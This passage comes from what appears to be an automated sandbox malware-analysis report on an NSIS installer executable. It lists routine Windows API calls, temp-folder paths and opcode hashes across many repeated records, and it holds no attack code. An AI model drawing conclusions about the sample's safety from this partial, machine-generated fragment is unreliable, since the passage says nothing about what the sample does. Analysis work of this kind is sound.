                                                                    • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                    • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                    • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                    • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                    • wsprintfW.USER32 ref: 00404B65
                                                                    • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                    • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                    • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                    • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000400,?,?,00000021), ref: 004025E8
                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000400,?,?,00000021), ref: 004025F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp
                                                                    • API String ID: 3109718747-3340595530
                                                                    • Opcode ID: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                                                    • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
                                                                    • Opcode Fuzzy Hash: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                                                    • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
                                                                    APIs
                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405C25
                                                                    • CharNextW.USER32(00000000), ref: 00405C2A
                                                                    • CharNextW.USER32(00000000), ref: 00405C42
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\nsu4D43.tmp, xrefs: 00405C18
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp
                                                                    • API String ID: 3213498283-3340595530
                                                                    • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                    • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                    • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                    • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 2659869361-297319885
                                                                    • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                    • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                    • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                    • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                    • GetTickCount.KERNEL32 ref: 00402EAA
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                    • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                    • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                    • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                    • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                    APIs
                                                                      • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405C25
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405CCD
                                                                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 00405CDD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp
                                                                    • API String ID: 3248276644-3340595530
                                                                    • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                    • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                    • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                    • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 004052A2
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                      • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                    • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                    • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                    • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F93420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00403913
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Free$GlobalLibrary
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 1100898210-297319885
                                                                    • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                    • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                    • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                    • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ln5S7fIBkY.exe,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ln5S7fIBkY.exe,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
